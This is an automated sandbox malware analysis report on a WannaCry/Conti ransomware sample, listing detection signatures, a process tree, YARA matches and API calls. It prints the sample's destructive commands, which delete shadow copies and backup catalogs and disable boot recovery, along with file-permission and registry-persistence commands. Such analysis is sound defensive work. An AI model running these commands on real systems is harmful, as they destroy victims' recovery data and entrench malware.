Windows Analysis Report
2N2jefqo8e.exe

Overview

General Information

Sample Name:2N2jefqo8e.exe
Analysis ID:795237
MD5:84c82835a5d21bbcf75a61706d8ab549
SHA1:5ff465afaabcbf0150d1a3ab2c2e74f3a4426467
SHA256:ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

Detection

Wannacry, Conti
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Conti ransomware
Multi AV Scanner detection for submitted file
Detected Wannacry Ransomware
Malicious sample detected (through community Yara rule)
Yara detected Wannacry ransomware
Antivirus / Scanner detection for submitted sample
Sigma detected: Delete shadow copy via WMIC
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Installs TOR (Internet Anonymizer)
Creates files in the recycle bin to hide itself
Found Tor onion address
Command shell drops VBS files
Uses bcdedit to modify the Windows boot settings
Machine Learning detection for sample
Drops PE files to the document folder of the user
Modifies existing user documents (likely ransomware behavior)
Writes many files with high entropy
Contains functionality to change the wallpaper
Machine Learning detection for dropped file
May use the Tor software to hide its network traffic
Deletes shadow drive data (may be related to ransomware)
Contains functionality to detect sleep reduction / modifications
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Drops files with a non-matching file extension (content does not match file extension)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Tries to load missing DLLs
Uses cacls to modify the permissions of files
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Uses reg.exe to modify the Windows registry
Found evaded block containing many API calls
PE file contains more sections than normal
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to read data from the clipboard

Classification

  • System is w10x64native
  • 2N2jefqo8e.exe (PID: 5208 cmdline: C:\Users\user\Desktop\2N2jefqo8e.exe MD5: 84C82835A5D21BBCF75A61706D8AB549)
    • attrib.exe (PID: 7956 cmdline: attrib +h . MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 7932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • icacls.exe (PID: 7940 cmdline: icacls . /grant Everyone:F /T /C /Q MD5: 2E49585E4E08565F52090B144062F97E)
      • conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • taskdl.exe (PID: 4828 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • cmd.exe (PID: 7480 cmdline: C:\Windows\system32\cmd.exe /c 140021675181576.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • cscript.exe (PID: 408 cmdline: cscript.exe //nologo m.vbs MD5: 13783FF4A2B614D7FBD58F5EEBDEDEF6)
    • taskdl.exe (PID: 4828 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 1672 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 2756 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 1576 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 1612 cmdline: @WanaDecryptor@.exe co MD5: 7BF2B57F2A205768755C07F238FB32CC)
      • taskhsvc.exe (PID: 1260 cmdline: TaskData\Tor\taskhsvc.exe MD5: FE7EB54691AD6E6AF77F8A9A0B6DE26D)
        • conhost.exe (PID: 384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7944 cmdline: cmd.exe /c start /b @WanaDecryptor@.exe vs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • @WanaDecryptor@.exe (PID: 2044 cmdline: @WanaDecryptor@.exe vs MD5: 7BF2B57F2A205768755C07F238FB32CC)
        • cmd.exe (PID: 7408 cmdline: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • WMIC.exe (PID: 7140 cmdline: wmic shadowcopy delete MD5: 82BB8430531876FBF5266E53460A393E)
    • taskse.exe (PID: 1368 cmdline: taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe MD5: 8495400F199AC77853C53B5A3F278F3E)
    • @WanaDecryptor@.exe (PID: 2660 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • cmd.exe (PID: 2684 cmdline: cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "atbiaihkhzu126" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • reg.exe (PID: 3376 cmdline: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "atbiaihkhzu126" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
    • taskdl.exe (PID: 5168 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskse.exe (PID: 7556 cmdline: taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe MD5: 8495400F199AC77853C53B5A3F278F3E)
    • @WanaDecryptor@.exe (PID: 3168 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 7572 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskse.exe (PID: 2428 cmdline: taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe MD5: 8495400F199AC77853C53B5A3F278F3E)
    • @WanaDecryptor@.exe (PID: 7600 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
2N2jefqo8e.exe | WannaCry_Ransomware | Detects WannaCry Ransomware | Florian Roth (with the help of binar.ly)
  • 0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q
  • 0x342d41:$x2: taskdl.exe
  • 0x35962d:$x2: taskdl.exe
  • 0xf4d8:$x3: tasksche.exe
  • 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA
  • 0xf52c:$x5: WNcry@2ol7
  • 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q
  • 0x359d91:$s2: Windows 10 -->
  • 0xf42c:$s3: cmd.exe /c "%s"
  • 0x41980:$s4: msg/m_portuguese.wnry
  • 0x3591ff:$s4: msg/m_portuguese.wnry
  • 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
  • 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56
  • 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
2N2jefqo8e.exe | JoeSecurity_Wannacry | Yara detected Wannacry ransomware | Joe Security
2N2jefqo8e.exe | Win32_Ransomware_WannaCry | unknown | ReversingLabs
    • 0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ...
    • 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
2N2jefqo8e.exe | wanna_cry_ransomware_generic | detects wannacry ransomware on disk and in virtual page | us-cert code analysis team
    • 0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
    • 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
Source | Rule | Description | Author | Strings
C:\@Please_Read_Me@.txt | WannaCry_RansomNote | Detects WannaCry Ransomware Note | Florian Roth
    • 0x2c0:$s1: A: Don't worry about decryption.
    • 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\r.wnry | WannaCry_RansomNote | Detects WannaCry Ransomware Note | Florian Roth
    • 0x27c:$s1: A: Don't worry about decryption.
    • 0x0:$s2: Q: What's wrong with my files?
Source | Rule | Description | Author | Strings
00000000.00000000.1583437170.000000000040E000.00000008.00000001.01000000.00000003.sdmp | wanna_cry_ransomware_generic | detects wannacry ransomware on disk and in virtual page | us-cert code analysis team
    • 0x14d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
    • 0x1500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp | JoeSecurity_Wannacry | Yara detected Wannacry ransomware | Joe Security
00000000.00000003.1955905665.0000000000A73000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Wannacry | Yara detected Wannacry ransomware | Joe Security
00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp | JoeSecurity_Wannacry | Yara detected Wannacry ransomware | Joe Security
00000032.00000000.3719845976.000000000041F000.00000008.00000001.01000000.00000008.sdmp | JoeSecurity_Wannacry | Yara detected Wannacry ransomware | Joe Security
Source | Rule | Description | Author | Strings
29.0.@WanaDecryptor@.exe.400000.0.unpack | JoeSecurity_Wannacry | Yara detected Wannacry ransomware | Joe Security
29.0.@WanaDecryptor@.exe.400000.0.unpack | Win32_Ransomware_WannaCry | unknown | ReversingLabs
              • 0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2
              • 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ...
              • 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
38.2.@WanaDecryptor@.exe.400000.0.unpack | JoeSecurity_Wannacry | Yara detected Wannacry ransomware | Joe Security
38.2.@WanaDecryptor@.exe.400000.0.unpack | Win32_Ransomware_WannaCry | unknown | ReversingLabs
                • 0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2
                • 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ...
                • 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
25.2.@WanaDecryptor@.exe.400000.0.unpack | JoeSecurity_Wannacry | Yara detected Wannacry ransomware | Joe Security

                  Operating System Destruction

                  Source: Process startedAuthor: Joe Security: Data: Command: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, CommandLine: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: @WanaDecryptor@.exe vs, ParentImage: C:\Users\user\Desktop\@WanaDecryptor@.exe, ParentProcessId: 2044, ParentProcessName: @WanaDecryptor@.exe, ProcessCommandLine: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, ProcessId: 7408, ProcessName: cmd.exe
                  No Snort rule has matched

                  AV Detection

                  Source: 2N2jefqo8e.exeVirustotal: Detection: 92%
                  Source: 2N2jefqo8e.exeReversingLabs: Detection: 95%
                  Source: 2N2jefqo8e.exeAvira: detected
                  Source: C:\@WanaDecryptor@.exeAvira: detection malicious, Label: LNK/Runner.VPDJ
                  Source: C:\@WanaDecryptor@.exeAvira: detection malicious, Label: TR/FileCoder.724645
                  Source: C:\@WanaDecryptor@.exeReversingLabs: Detection: 96%
                  Source: C:\@WanaDecryptor@.exeVirustotal: Detection: 91%
                  Source: C:\Users\user\AppData\Local\@WanaDecryptor@.exeReversingLabs: Detection: 96%
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeReversingLabs: Detection: 96%
                  Source: C:\Users\user\Desktop\taskdl.exeReversingLabs: Detection: 89%
                  Source: C:\Users\user\Desktop\taskse.exeReversingLabs: Detection: 89%
                  Source: C:\Users\user\Desktop\u.wnryReversingLabs: Detection: 96%
                  Source: C:\Users\user\Documents\@WanaDecryptor@.exeReversingLabs: Detection: 96%
                  Source: C:\Users\user\Downloads\@WanaDecryptor@.exeReversingLabs: Detection: 96%
                  Source: C:\Users\Default\Desktop\@WanaDecryptor@.exeReversingLabs: Detection: 96%
                  Source: C:\Users\Public\Desktop\@WanaDecryptor@.exeReversingLabs: Detection: 96%
                  Source: 2N2jefqo8e.exeJoe Sandbox ML: detected
                  Source: C:\@WanaDecryptor@.exeJoe Sandbox ML: detected
                  Source: 0.0.2N2jefqo8e.exe.400000.0.unpackAvira: Label: TR/Ransom.JB
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_004049B0 CreateFileA,GetFileSize,GlobalAlloc,ReadFile,CryptImportKey,_local_unwind2,_local_unwind2,25_2_004049B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00404AF0 EnterCriticalSection,CryptDecrypt,LeaveCriticalSection,LeaveCriticalSection,25_2_00404AF0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,25_2_00404B70
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_004046F0 CryptImportKey,25_2_004046F0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_004046B0 CryptAcquireContextA,25_2_004046B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00404770 CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,25_2_00404770
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_004047C0 CryptEncrypt,_local_unwind2,CryptDecrypt,strncmp,_local_unwind2,25_2_004047C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_004049B0 CreateFileA,GetFileSize,GlobalAlloc,ReadFile,CryptImportKey,_local_unwind2,_local_unwind2,29_2_004049B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_00404AF0 EnterCriticalSection,CryptDecrypt,LeaveCriticalSection,LeaveCriticalSection,29_2_00404AF0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,29_2_00404B70
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_004046F0 CryptImportKey,29_2_004046F0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_004046B0 CryptAcquireContextA,29_2_004046B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_00404770 CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,29_2_00404770
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_004047C0 CryptEncrypt,_local_unwind2,CryptDecrypt,strncmp,_local_unwind2,29_2_004047C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_004049B0 CreateFileA,GetFileSize,GlobalAlloc,ReadFile,CryptImportKey,_local_unwind2,_local_unwind2,38_2_004049B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_00404AF0 EnterCriticalSection,CryptDecrypt,LeaveCriticalSection,LeaveCriticalSection,38_2_00404AF0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,38_2_00404B70
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_004046F0 CryptImportKey,38_2_004046F0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_004046B0 CryptAcquireContextA,38_2_004046B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_00404770 CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,38_2_00404770
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_004047C0 CryptEncrypt,_local_unwind2,CryptDecrypt,strncmp,_local_unwind2,38_2_004047C0
                  Source: taskhsvc.exe, 0000001E.00000003.5233677563.00000000034A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN RSA PUBLIC KEY-----
                  Source: 2N2jefqo8e.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 92.205.17.93:443 -> 192.168.11.20:49825 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 92.205.17.93:443 -> 192.168.11.20:49853 version: TLS 1.2
                  Source: C:\Users\user\Desktop\taskdl.exeCode function: 7_2_00401080 GetDriveTypeW,Sleep,swprintf,swprintf,FindFirstFileW,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,DeleteFileW,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,DeleteFileW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,7_2_00401080
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,25_2_004080C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,25_2_00403CB0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,DeleteFileW,swprintf,DeleteFileW,#825,#825,25_2_004026B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,29_2_004080C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,29_2_00403CB0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 29_2_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,DeleteFileW,swprintf,DeleteFileW,#825,#825,29_2_004026B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,38_2_004080C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,38_2_00403CB0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 38_2_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,DeleteFileW,swprintf,DeleteFileW,#825,#825,38_2_004026B0
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\~SDF307.tmpJump to behavior
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\~SDF308.tmpJump to behavior
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Temp\~SDF306.tmpJump to behavior
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\~SDF303.tmpJump to behavior
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\~SDF304.tmpJump to behavior
                  Source: C:\Users\user\Desktop\2N2jefqo8e.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\~SDF305.tmpJump to behavior

                  Networking

                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\tor.exeJump to behavior
